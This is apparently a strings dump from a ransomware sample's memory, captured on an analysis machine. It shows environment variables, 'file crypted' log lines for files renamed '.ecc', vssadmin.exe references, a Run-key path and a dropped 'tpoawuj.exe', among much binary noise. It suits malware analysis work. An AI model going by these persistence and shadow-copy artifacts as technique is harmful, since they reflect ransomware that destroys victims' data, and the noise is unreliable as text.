Ut-w
t-w
,w<
O)w<
,w
,w&
C:\Windows\SysWOW64
p-w
;q-w
..w
u2-w8Or
@Vr
O)w
,w&
C:\Windows\SysWOW64
z:w
,Q/w
,wV
,w*
,wJ
HRr
@0m
DHn
d-wDHn
(Hn
C:\Windows
pyo
47m
,w0
j.-w
 z:w
:w,
,Q/w
~--w
,wJ
S1w
,wJ
HRr
0.dll
dll
u2-w
C:\Windows\SYSTEM32\kernelbase.dll
`yo
~--w$
0wJ
0w:Q.w
pi-ms-win-core-processthreads-l1-1-0
{:w
0wB
U1w
.wz
uf+w
U/w
-wl"0w
{:w
0:w
Y9w`59w
,wD
`{:w
{:w
90w
@pm
 um
}X/w
0wj
MX/w
8c1w
8Hr
n$n
n.n
n8n
nrm
nhm
n^m
n,m
n6m
nTm
nJm
n@m
nBn
ngn
C:\Windows\SysWOW64\vssadmin.exe
\??\C:\Windows\SysWOW64\vssadmin.exe
2786-38585en-US
Microsoft.Windows.VssAdmin
RPCRT4.dll
0123456789
3;0
h:mm:ss tt
h:mm tt
M/d/yyyy
MMMM yyyy
dddd, MMMM d, yyyy
52-
! #!%"'#)$+%-&/'1(3)5*7+9,;-=.?/A0E1I2M3Q4U5Y6]7a8e9i:m;q<u=y>}?
 Wr
`yo
@vo
xYr
hvo
0wo
Xwo
Hxo
8Xr
 xo
pxo
PYr
(Yr
HWr
`Xr
pWr
(Bn
(Bn
(Bn
(Bn
'Bn
'Bn
Bn
Bnp&Cn
Bn
Bnp&Cn
(Bn
(Bn
(Bn
Cache-Control
Connection
Proxy-Connection
Date
Keep-Alive
Pragma
Trailer
Transfer-Encoding
Upgrade
Via
Warning
Allow
Content-Length
Content-Type
Content-Encoding
Content-Language
Content-Location
Content-MD5
Content-Range
Expires
Last-Modified
Accept
Accept-Charset
Accept-Encoding
Accept-Language
Authorization
Cookie
Expect
From
Host
If-Match
If-Modified-Since
If-None-Match
If-Range
If-Unmodified-Since
Max-Forwards
Proxy-Authorization
Referer
Range
User-Agent
Accept-Ranges
Age
Authentication-Info
ETag
Location
P3P
Proxy-Authenticate
Proxy-Support
Retry-After
Server
Set-Cookie
Vary
WWW-Authenticate
Persistent-Auth
Fn0
Fn0
Fn0
}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
@@@@@@
 !"#$%&'()*+,-./0123@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
TIMR
Gn@
ECES
ECES
ECES
ECES
ECES
ECES
ECES
ECES
ECES
ECES$
ECES0
ECES<
ECESH
ECEST
ECES`
ECESl
ECESx
ECES
ECES
ECES
ECES
ECES
ECES
ECES
ECES
ECES
ECES
ECES
ECES
ECES
ECES
ECES,
ECES8
ECESD
ECESP
ECES\
ECESh
ECESt
ECES
ECES
ECES
ECES
ECES
ECES
ECES
ECES
ECES
ECES
ECES
ECES
ECES
ECES
ECES(
ECES4
ECES@
ECESL
ECESX
ECESd
ECESp
ECES|
ECES
ECES
ECES
ECES
TPWO0
plGn
(LBn
(LBn
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Gn@
Gn`
Gn8
GnX
Gn0
Gnx
Gn8
GnX
Gn0
Gnx
GnP
Gn@
Gn`
Gn8
GnX
Gn0
Gnx
GnP
Gn(
Gnp
GnH
Gn
Gnh
Gn@
Gn`
Cnp
CnP
CnP
CnP
hSp
 h:w
@ @
pO;u
 Fu
0*/w
csm
monProg
F;u
File
?urogr
Ovram Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=DESKTOP-AERI7HN
ComSpec=C
'~u
(~u (~u
(~u
'~u0(~u@(~uP(~u`(~up(~u
(~uTRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default
HOMEDRIVE=C:
HOMEPAT
yv
yv0
yv
yvp
yv`
yvP
yv@
yv@
yv0
yvP
yv`
yvp
yvy\On
s *
s@*
s`*
sP*
sp*
s0+
s@+
sP+
s`+
sp+
s ,
sData
z,t
sPath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
qNNAME=Console
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\Dummy\AppData\Local\Temp
TMP=C:\Users\Dummy
uSERDOMAIN_ROAMINGPROFILE=DESKTOP-AERI7HN
USERNAME=Dummy
USERPROFILE=C:\Users\Dummy
windi



abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\Dummy\AppData\Roaming
CommonProgramFiles=C:\Program Files (x86)\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=DESKTOP-AERI7HN
ComSpec=C:\Windows\system32\cmd.exe
FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default
HOMEDRIVE=C:
HOMEPATH=\Users\Dummy
LOCALAPPDATA=C:\Users\Dummy\AppData\Local
LOGONSERVER=\\DESKTOP-AERI7HN
NUMBER_OF_PROCESSORS=4
OneDrive=C:\Users\Dummy\OneDrive
OS=Windows_NT
Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\Dummy\Desktop\sysinterals\Procdump;C:\Users\Dummy\Desktop\sysinterals\Strings;C:\Users\Dummy\Desktop\sysinterals\ProcessMonitor;C:\Users\Dummy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Python 3.7;C:\Program Files\Git\cmd;C:\Program Files\nodejs\;C:\Users\Dummy\AppData\Local\Programs\Python\Python37\Scripts\;C:\Users\Dummy\AppData\Local\Programs\Python\Python37\;C:\Users\Dummy\AppData\Local\Microsoft\WindowsApps;C:\Users\Dummy\AppData\Roaming\npm
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_ARCHITEW6432=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 142 Stepping 9, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=8e09
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files (x86)
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PUBLIC=C:\Users\Public
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\Dummy\AppData\Local\Temp
TMP=C:\Users\Dummy\AppData\Local\Temp
USERDOMAIN=DESKTOP-AERI7HN
USERDOMAIN_ROAMINGPROFILE=DESKTOP-AERI7HN
USERNAME=Dummy
USERPROFILE=C:\Users\Dummy
windir=C:\Windows
&Fu(&FuH&Fuh&Fu
&Fu
&Fu
&Fu
&Fu
'Fu('FuH'Fuh'Fu
'Fu
'Fu
'Fu
'Fu
(Fu((FuH(Fuh(Fu
pO;u
1Fu
 Fu
0*/w
pO;u
1Fu
 Fu
0*/w
pO;u
1Fu
 Fu
0*/w
pO;u
 Fu
0*/w
pO;u
1Fu
 Fu
0*/w
pO;u
1Fu
 Fu
0*/w
pO;u
 Fu
0*/w
Ar
Ar0
Ar@
ArP
Ar`
Arp
Ar@
ArP
Ar`
Arp
Ar
Ar0
Ar@
Ar`
ArP
Arp
@hWv
1>W
pO;u
1Fu
 Fu
0*/w
pO;u
1Fu
 Fu
0*/w
pO;u
 Fu
0*/w
pO;u
1Fu
 Fu
0*/w
0*/w
DnO
Dnc
s`Y
s0R
s@I
wP7
w@[
wpq
JC
n|@%
-G%y
r<s
)`)`*`*`E@E@+`+`
@>m
 >m
lL[
$\w
,\w
d5s
by6s
d2s
cm2s
,0w#
hd5s
90w#
H-w
_G-w:
_G-w
0wB
/-w
">Ou
-FNu
Mu@QNu
Qu}
zQum
vQu
vQu
Lu`
Qu}h(
vQu
wQu
H-w
_G-wb
vQu
vQu
|:w%
/W/w
vQu$
0wB
/-w
~--wxxw
~--w
90w
,w4
,wxxw
xxw
`B0w#
xxw
xxw
xxw
uxxw
}X/wxxw
xxw
0wj
MX/w
8c1w
,wxxw
8@S
(Hq
s`Y
q 1
q o
q`F
q0#
WMv
ppI
Internet Explorer
Windows\CurrentVersion\Internet Settings
Internet Explorer
3QB
3QB
3QB
3QB
3QB
3QB
3QB
3QB
3QB
3QB
3QB
3QB
3QB
3QB
3QB
3QB
3QB
3QB
3QB
p,M
pl4
pl4
pl4
pl4
plU
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
p ;
pl4
pl4
pl4
pl4
p|6
pTR
pl4
pl4
pl4
pt5
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
p,M
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pt5
pl4
pl4
ppE
pl4
pd3
p4N
phD
pDP
pl4
p0=
pl4
pl4
p`C
pl4
pl4
pXB
pl4
pl4
pl4
pl4
pl4
pl4
pt5
pl4
pl4
pl4
pl4
p@?
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pl4
pt5
pl4
pl4
pl4
pLQ
pl4
pl4
pd3
pl4
pl4
pl4
pl4
pl4
p`C
pl4
p(<
p8>
p,M
p@?
pl4
pl4
pl4
pl4
p`C
p$L
pl4
pxF
pH@
pt5
p8>
pl4
px
pl4
pX!
p\S
pl4
pD"
px"
pl4
pl4
pP#
pl4
pl4
p0$
pP%
p0&
pl4
pdT
pP'
pl4
p0(
pl4
px(
pPA
pX)
pl4
pl4
p8*
p|+
pl4
pl4
pX,
pl4
pl4
p$-
p<O
pP-
pl4
p(.
pl4
pp.
pl4
p@?
p</
pp/
pl4
p`0
pl4
pl4
pH1
pl4
pl4
pL2
px2
pl4
px~
pH~
pH3
p(3
p Q
p(Q
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVbad_alloc@std@@
.?AVResultException@wil@@
.?AVexception@@
Default
file
Browser
yz|
;bc
+?Hr
+45
?H~
?c8
wqlW
=TZk
HG8
?Ha
 >?HIJKLMTiqrw~
PQop
c\?
?JKLM
tyz|
8ve
#/0<ABUV]d
nSoftware\Microsoft\Windows\CurrentVersion\Internet Settings
oftware\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
oftware\Microsoft\Internet Explorer\Main
oftware\Microsoft\Internet Explorer\Main
oftware\Microsoft\Internet Explorer\Security
oftware\Microsoft\Internet Explorer\Security
oftware\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
oftware\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
oftware\Microsoft\Windows\CurrentVersion\Internet Settings
nSoftware\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Internet Explorer
Internet Explorer
cLu
 bLu
^Lu
WLu
SLu
[Lu
@jPu
@jPu
SQu
Lux
ZuP
Mu$
Mu|
Lux
zMu
Zu@
Lu(#
Lu)#
Lu*#
Lu+#
Lu,#
Mu-#
Mu.#
Lu/#
Lu0#
Lu1#
Lu2#
Lu3#
Lu4#
Lu5#
Lu6#
YuP
@uq
@({q
ZuX
Zu@
Zuh
Zup
ZuH
Zu
Zu`
Lu0
Zu4
Lux
ZuP
Zul
Zu0
Lux
Zux
Zu@
Lu\
Zu\
Zu`
Lu@
Zu@
Lu$
Zu$
Lu|
Zu
Lu(
Zu`
Zu(
Zu8
ZuP
Zuh
Zuh
Lud
Zu(
ZuH
Zuh
ZuH
ZuH
Zu8
ZuX
Zux
Zu0
Zu(
ZuH
Zuh
Zu$
Zu*
Zu
Zu
Zu#
Zu6
Zu7
Zu8
Zu9
Zu@
Zu+
ZuR
Zu+
ZuR
Zu.
Zu.
 gUu gUu
|Uu
~Uu
gUu
qUupjUu
Uu`
Uu0wUu0wUu
UuP
hOu@TQu
nQu
Pu
6Tu
Pup4Tu
Su`
@Xu0=Xup:Xu
7Xu
>Xu`;Xup9Xu
6Xu
Oup
Tu@
Ou
+Uup9Ou0
Uu` Uu@
Tu@
Tu
mQu
cTu
"Uu
rQu
eTu
Uu`'Uu@
Uu
Tu@
Tup
Tup
TuP4Uu`
Uu`
Uup(Uu@
Tu@
Tu@0Uu0
Su0EUu
Tu`HUu
)Uu
3Uup1Uu`
Uup
Tup
TuP
Ou0
Tu0
TuP%Uu
Nu0-Uu
Tu`
Tu`
Tu@
TuP
TuP
?Uu
yPu
_Pu
Nu
Tu@
*Uu
3Uu
Nu0
Nup
Nup
TupMPuP
!Uu
TuPdTu
-Uu
Nu@
Nu@
Pu`
VNu`
'UuP
Tu@
Tu .Uu
Uu0
Nu`
Nu`CUu
Nu@GUuP
(Uu
2Uu
0Uu@
Uup
Tu`
Nu0
Nup
Nu0#Uu
,UuP
Tu
Tu
?Uu
Qu0:Qup
Tup
Tu
Tu
Yu@
Yup
Yup
Zu
@fQu
@fQu
PlTu
PlTu
 nTu
mTu
Zu
 iTu
 iTu
Zu4
bUu
bUu
bUu
bUu
bUu
bUu
bUu
bUu
bUu
bUu
bUu
bUu
bUu
bUu
bUu
Zux
bUu
Zul
bUu
Zu`
bUu
ZuT
bUu
ZuH
bUu
Zu<
bUu
Zu0
bUu
Zu$
bUu
bUu
bUu
bUu
bUu
bUu
bUu
bUu
bUu
bUu
bUu
bUu
bUu
bUu
Zu|
bUu
Zup
bUu
Zud
bUu
ZuX
bUu
Zu<
bUu
Zu$
bUu
bUu
Zux
|Uu
~Uu
Zul
ZuH
gUu
gUu
gUu
gUu
qUu
pjUu
Zu0
ZuH
0wUu
Zux
0wUu
Zul
Zu`
ZuT
ZuH
Zu0
`iUu
`iUu
`iUu
`iUu
`iUu
`iUu
`iUu
Zup
`iUu
ZuX
`iUu
Zu@
PhUu
Zu(
Zu<
ZuT
Zut
@TQu
Zu8
p4Tu
Zu,
pTQu
TQu
TQu
TQu
`TQu
TQu
'Xu
Zu
Zu
Zul
Zu`
` Uu
ZuH
ZuH
Zux
Zu`
@0Uu
Zu0
Zux
ZuT
ZuH
Zu0
Zul
ZuL
Zu@
ZuH
Zu<
)Uu
3Uu
3Uu
p1Uu
Zu\
P%Uu
Zux
0-Uu
Zu`
ZuH
Zu<
?Uu
Zu0
PAUu
BUu
Zul
Zu`
ZuH
ZuH
Zux
Zu`
 .Uu
Zu0
-Uu
Zux
Zut
ZuT
ZuH
Zu0
Zul
VNu
ZuL
Zu@
ZuH
Zu<
(Uu
2Uu
2Uu
0Uu
Zu\
0#Uu
Zux
,Uu
Zu`
ZuH
Zu<
?Uu
Zu0
p@Uu
0BUu
Zut
Zu`
ZuL
Zut
Zu`
ZuL
LuT
ZuP
Zu(
8Cu
0Eu
 Ur
XMs
0Eu
 Ur
@Tr
XUr
ZuX
Zux
ZuP
Zu(
Zu`
Zu8
Zuh
Zu@
Zu0
8|p
#&w
V"M
+T;
8Um
]\_
}2TQ
ubf
+cH&
u 1
p{~
p`~
$uv
n0t
s0E
s`F
s O
s@J
s0K
s@L
sP:
sPI
sP8
Qu&
QuK
v@/
v0X
v@O
v0+
Quv
ees`jes
des
^es
Kes`Jes
kes
nesPGes
Hes
Yes`Oes
ves
Les
tes
Ces
;es
6es@`es
ces Res
Qu)
QuX
Qub
Qu>
QuS
QuH
Qul
Qun
QuR
#*Xf
Po8u
o8u
o8u
d5s
ny6s
d5s
ny6s
d5s
ny6s
92s
M2s
\2s
F1s
Tn2s
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\norm
ziz
\??\C:\Program Files\nodejs\no
?_m
\??\C:\Program Files\nodejs\no
?_m
\??\C:\Program Files\nodejs\node_modules\npm\node_modu
-buffer\
json.ecc
pem.ecc
0w#
hd5s
02@
0w#
@6o
c!!
thmfile
end
themewnd
end
O]m
q\\
q\\
q\\
q\\
q\\
q\\
q\\
q\\
q\\
q\\
qt\
q,[
(/J
SAD
JJn8
xHd
Hj@
0d'
$@u
tpoawuj
Ygu Zgu
fu0
fuP
lu@0fu
sfu
gu@
fu`
gu0
fu@
lu
gu0
s`A
sp?
s`;
s`:
s0i
m/W-
0w?s
"yB
Prl
l\node_moduleslize-package-data\node_modules\resolve\test\resolver\multirepo\lerna.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\node_modules\resolve\test\resolver\multirepo\package.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\node_modules\resolve\test\resolver\multirepo\packages\package-a\package.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data
_G-w
.AC
Prl
Mb-wt
0pl
*~C
\-w
j.-w(
~--w
~--w
*-w
@+-w
u\n
C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\node_modules\resolve\te
olve
.wd
yV.w(
0wJ
>k~
 +Y
AMk
FmT
l?6
$X0y
+K%
 y!
C:\\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\node_modules\resolve\test\resolver\symlinked\_\node_modules\foo.js.ecc
\-w
j.-w&
`Ou
~--w
~--w
*-whOu
@+-w
hOu
C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\node_modules\resolve\test\resolver\symlinked\_\symlink_target\*.*
j.-wD
~--wt
X<F
`Ou
~Pu
j.-w
0wX
X<F
.gitkeep
X<F
X<F
X<F
>k~
 +Y
AMk
FmT
l?6
$X0y
+K%
 y!
GITKEE~1
JSO
C:\\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\node_modules\resolve\test\resolver\symlinked\_\symlink_target\.gitkeep
_G-w
@8r
88r
0wB
/-w
x7F
~--w
~--w
 :F
*-w8
@+-w
C:\Program Files\nodejs\node_modules\npm\node_modules\parallel-tra
e_modules\readab*
89F
H:F
@8r
@8r
L:F
yV.w
u :F
0wr
(.l
0;F
>k~
 +Y
AMk
FmT
l?6
$X0y
+K%
 y!
SYMLIN~1
C:\\
C:\\Program Files\nodejs\node_modules\npm\node_modules\parallel-transform\node_modules\readable-stream\lib\internal\streams\stream.js.ecc
_G-w
 ZF
 8u
 ZF
8ZF
\-wz
j.-w
<ZF
~--w
~--w
(]F
*-w
@+-w
`]F
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-retry\node_modules\retry\test\integrat
st-t
pxo
yV.w
Hjq
(]F
>k~
 +Y
AMk
FmT
l?6
$X0y
+K%
 y!
TREAM~1.JS
C:\\
C:\\Program Files\nodejs\node_modules\npm\node_modules\promise-retry\node_modules\retry\test\integration\test-timeouts.js.ecc
PyF
hyF
\-w*
 yo
0dq
Ldq
Ldq
HyF
j.-w
Xoq
lyF
~--w
~--w
4|F
*-w`oq
@+-w
@|F
`oq
X|F
C:\Program Files\nodejs\node_modules\npm\node_modules\readdir-scoped-modules\test\fixtures\b\y\*.*
j.-w
~--w0
.wT
Xoq
4|F
@+-w
8}F
8}F
z\n
C:\Program Files\nodejs\node_modules\npm\node_modules\readable-stream\lib\internal\streams\stream.js
`~F
j.-w
-w8
yV.w
yV.w
.keep
>k~
 +Y
AMk
FmT
l?6
$X0y
+K%
 y!
KEEP~1
C:\\Program Files\nodejs\node_modules\npm\node_modules\readdir-scoped-modules\test\fixtures\b\y\.keep
_G-wBf
t~m
Mb-w\
0pl
*~C
j.-w
~--wx
~--w
*-w8
@+-w
Hjq
*-w
C:\Program Files\nodejs\node_modules\npm\node_modules\run-queue\node_modules\aproba\package.json.ecc
-w*[
|+v
|+v
j.-w
~--w
u(El
VQB
h-@
>k~
 +Y
AMk
FmT
l?6
$X0y
+K%
 y!
c\U
C:\\Program Files\nodejs\node_modules\npm\node_modules\run-queue\node_modules\aproba\package.json.ecc
n:w
yV.w
0w<
yV.w
README.md
.js
n.js
>k~
 +Y
AMk
FmT
l?6
$X0y
+K%
 y!
ACKAG~1.JSO
C:\\Program Files\nodejs\node_modules\npm\node_modules\run-queue\node_modules\aproba\README.md
Mb-w
0pl
*~C
Mb-w
\-w
Pvo
$zo
$zo
j.-w
~--w
~--w
*-w`
@+-wg
oul
C:\Program Files\nodejs\node_modules\npm\node_modules\safer-buffer\package.json
_G-w
4Cl
0wB
/-w
0w?s
d.G
>k~
 +Y
AMk
FmT
l?6
$X0y
+K%
 y!
7tAZoB
C:\\Program Files\nodejs\node_modules\npm\node_modules\safer-buffer\package.json.ecc
yV.wX
package.json
.js
4.xml
d.G
d.G
>k~
 +Y
AMk
FmT
l?6
$X0y
+K%
 y!
PACKAG~1.JSO
C:\\Program Files\nodejs\node_modules\npm\node_modules\safer-buffer\package.json
R1@
d.G
d.G
@,G
d.G
l~C
d.G
safer-buffer
filename
8-G
D-G
VQB
H-G
 -G
h-@
>k~
 +Y
AMk
FmT
l?6
$X0y
+K%
 y!
SAFER-~1
_RO
C:\\Program Files\nodejs\node_modules\npm\node_modules\safer-buffer
filename
MQy
R1@
l~C
node_modules
ist
dll
exe
VQB
h-@
>k~
 +Y
AMk
FmT
l?6
$X0y
+K%
 y!
NODE_M~1
C:\\Program Files\nodejs\node_modules\npm\node_modules
R1@
hqG
l~C
npm
all.ins
.mui
`rG
0rG
(rG
lrG
VQB
prG
DrG
HrG
h-@
>k~
 +Y
AMk
FmT
l?6
$X0y
+K%
 y!
C:\\Program Files\nodejs\node_modules\npm
R1@
l~C
node_modules
ider.man
NODE_M~1
MAN
C:\\Program Files\nodejs\node_modules
ider.man
R1@
l~C
nodejs
t Explorer
-2945462786-3858536984-1001
NTERN~1
C:\\Program Files\nodejs
t Explorer
R1@
l~C
Program Files
Settings
PROGRA~1
C:\\Program Files
Settings
02@
02@
I"@a/r
C:\
D:\
|:w
4,w%4,w
`{:w,
0w/W/wt
|:w
|:w
80w
.wB
!0w
.w$
02@
`B0w#
}X/w
0wj
MX/w
8c1w
02@
n#+
n-+
n7+
nA+
nK+
nU+
n_+
ni+
ns+
opE
o0f
n}+
n<,
nF,
DST
vT6
Clie
b'?
z-=
vT6
@+'
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
NIB
oT6
DCB
oT6
oT6
oT6
ox.
oD.
o,C
oX2
o(3
o$2
oT1
opU
otn
oDo
olT
o|p
oLq
o@V
o@n
ohK
oHp
o4K
otV
odJ
oxo
o<U
o`I
oDW
o,I
o0J
 tLn
sLn
sLn
tLn
tLn
n Z
n`Z
nPe
n 1
np5
n`9
@Fm
n8M
n`B
(/J
SAD
JJn8
ltL
n0(
?6.8L
n0(
nh{
n |
n2@
n `
n!`
n"`
n#`
n$`
nC@
n1@
n3@
n @
n0@
n!@
n#@
n,`
nK@
n$@
n%@
n&@
n(@
n)@
n)p
nG@
n'p
nF@
n p
n!p
n"p
n#p
n$p
n(p
n%p
n&p
n%`
n&`
n'`
n(`
n4@
n5@
n6@
n7@
n8@
n9@
n:@
n;@
n<@
n=@
n>@
n?@
n@@
nA@
nB@
n)`
n*`
nE@
n+`
nH@
nI@
nJ@
n+p
nL@
n,p
n0p
nN@
n1p
n2`
nP@
n-p
n.p
n/p
n:p
n-`
n.`
n/`
nO@
n2p
n0`
nQ@
n1`
nR@
n3p
nS@
n4p
nD@
n5p
n6p
nU@
n7p
n8p
nV@
nW@
n3`
n4`
nX@
nT@
n?p
n=p
n>p
n9p
n<p
nY@
n P
nAp
n@p
n5`
n6`
n7`
nBp
nCp
n8`
n*@
5#
)`)`*`*`E@E@+`+`
333f3
333
f33
3f3
ff3
f3fff
33f
f3f
3ff
fff
@6m
h5m
@C:\Users\Dummy\AppData\Roaming\tpoawuj.exe
HUm
 Vm
8Am
s`\
2Ln
2Ln
1Ln
/2s
.2s
@.2s
N.2s
Tn2s
`?Qu
`B0w
hd5s
`?Qu
`?QuT
#0w#
wX5
v`!
v`O
.?AVtype_info@@
.?AVResultException@wil@@
.?AVexception@std@@
SOFTWARE\Microsoft\Ole\Extensions
winRTDesktopBrokerCLSID
w`3
 &n
v #
vX#
vX$
vD$
vl$
v,$
w }
sPd
s@d
s d
s@d
s@d
sPd
s0d
s@d
{.bI
c.V
ew|>&=4_
^`i
W$N
bVn{
"BS
x@p
sg/
sQ.
sv.
7u`
7up
&7u
7up
s8/
sS/
csp/cs@]cs >cs
4cs
Ucs
=cs
9cs
2cs
5cs
$Ln
u 5
<hu
fu`V1w
gu`
Xgu
xgu
+gu
gup
gu@Hgu
gu`1huP9huP2guP
eu
gu0
8Jn
0=m
u\w
xy}
u0g
vlg
(/J
SAD
JJn8
!sg
u\w
(/J
SAD
JJn8
f+E
o||
vlg
zzG
u\w
(/J
SAD
JJn8
f+E
vlg
R2]
R7M
upy
u\w
4do
VDx
u`|
u\w
u\w
fZ@U8
vlg
`Z~J[
(/J
SAD
JJn8
f+E
u\w
vlg
(/J
SAD
JJn8
G+J
P*B
u@:
up&
[mrm_res_map__]
[mrm_res_map2_]
[mrm_res_map3_]
[mrm_res_link]
[mrm_env_map]
[mrm_decn_info]
[mrm_pri_desc ]
[mrm_pridescex]
[mrm_rev_map]
c.V
ew|>&=4_
^`i
W$N
bVn{
"BS
`C]
@8m
mTV
tpoawuj.exe
@4n
en-US
United States
3;0
0123456789
3;0
h:mm:ss tt
h:mm tt
M/d/yyyy
MMMM yyyy
dddd, MMMM d, yyyy
x8m
dVQ
U$Q
+w N/wp
@4n
uH9
u&9
u*1
u41
u>1
uH1
uR1
u\1
uf1
up1
uz1
ux0
u%N
u07
u&7
uh6
ur6
u|6
uPx
vpk
v k
v j
v`l
v@R
u`{
v :
u0:
u:8
uD7
u_7
ui7
us7
uN8
u}7
gu@dfu
u&:
HWv
p;P
x05s
x05s
Fdo
d5s
x05s
V8s
=O8s
V8s
T8s
]8s
o2s
nm2s
n2s
nm2s
o2s
F1s
nm2s
n2s
o2s
o2s
nm2s
n2s
nm2s
p;P
x05s
*,MA
ZMA
d5s
X1w
 A0w
/2s
A0w
|3s
X1w
 A0w
/2s
A0w
|3s
y3s4
-8s
y3s4
BA8s
[qC
YpC
p;P
jwC
p;P
p;P
@:P
p,P
p;P
z;P
@:P
p;P
@:P
p;P
p;P
00P
p;P
p;P
(E5s
05s
5-294546
p;P
p;P
F1s
y8s
h8s
SZ4
cm2s
Eec
pI1s
P:P
h\E
l2s
P:P
P:P
oHB
Eec
25s
<mI
3++S++
25s
f5s
Po5s
Eec
P:P
@l5s
%1s
@l5s
%1s
P:P
\??\C:\Windows\S
vssadmin.exe
YSTEM32\vssadmin.exe
e4\Hber
ysWOW64\vssadmin.exe
\REGISTRY\USER\S-1-5-21-609387795-2945462786-3858536984-1001\Software\Microsoft\Windows\CurrentVersion\Run
Z\do
0pl
hd5s
Po5s
C:\Windows\SysWOW64\ntdll.dll
w64.dll
Eec
0*P
pdQ
pdQ
U+I
PdQ
Eec
 A0w
gux
H-w`
_G-w:
_G-w
jus
H-w
_G-wZ
f~m
-w@
~--w
m:w0Jo
v0Jo
qc/w
U1wa
/wP
,wP
/wP
vXVp
.wf
.wpVp
90w
,wP
\ln
@Vp
}X/wP
0wj
MX/w
8c1w
,wP
0A<s
(s&
(s&
|:w
y:w
{:w
@f:w
S:w
{:w
@Nn
0Ln
{:w
p1s
0An
0Ln
p1s
p1s
h2'
p1s
(u&
(u&
(u&
(u&
(u&
(u&
(u&
(u&
(u&
(u$
(u$
(u$
(u$
(u$
(u$
(u$
(uX
(uHgn
(ux
(u8
.?AVbad_alloc@std@@
.?AVbad_exception@std@@
.?AVexception@std@@
.?AV__non_rtti_object@std@@
.?AVbad_typeid@std@@
.?AVbad_cast@std@@
.?AVDNameNode@@
.?AVcharNode@@
.?AVpcharNode@@
.?AVpDNameNode@@
.?AVDNameStatusNode@@
.?AVpairNode@@
.?AVtype_info@@

abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ




PST
PDT
PDT
PST
@8m
Xrn
(u
 en
Hgn
pin
pin
pin
u0K
u@?
u r
u`=
u0<
u0v
u|B
u$B
uDA
u4@
up>
.?AVtype_info@@
.?AVbad_alloc@std@@
.?AVCAtlException@ATL@@
.?AVexception@std@@
_Ku
AAAAAAAAAA
{00020420-0000-0000-C000-000000000046}
{00020424-0000-0000-C000-000000000046}
C:\Windows\system32\
|sC
@sC
th=
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVlogic_error@std@@
.?AVruntime_error@std@@
.?AVlength_error@std@@
.?AVbignum_error@@
|}C
p}C
d}C
X}C
L}C
@}C
4}C
(}C
t|C
l|C
`|C
T|C
H|C
<|C
0|C
$|C
x{C
l{C
`{C
T{C
H{C
<{C
0{C
${C
xzC
lzC
`zC
XzC
LzC
@zC
(zC
pyC
`yC
LyC
@yC
4yC
(yC
xxC
lxC
`xC
TxC
DxC
8xC
,xC
 xC
xwC
hwC
\wC
PwC
DwC
8wC
,wC
 wC
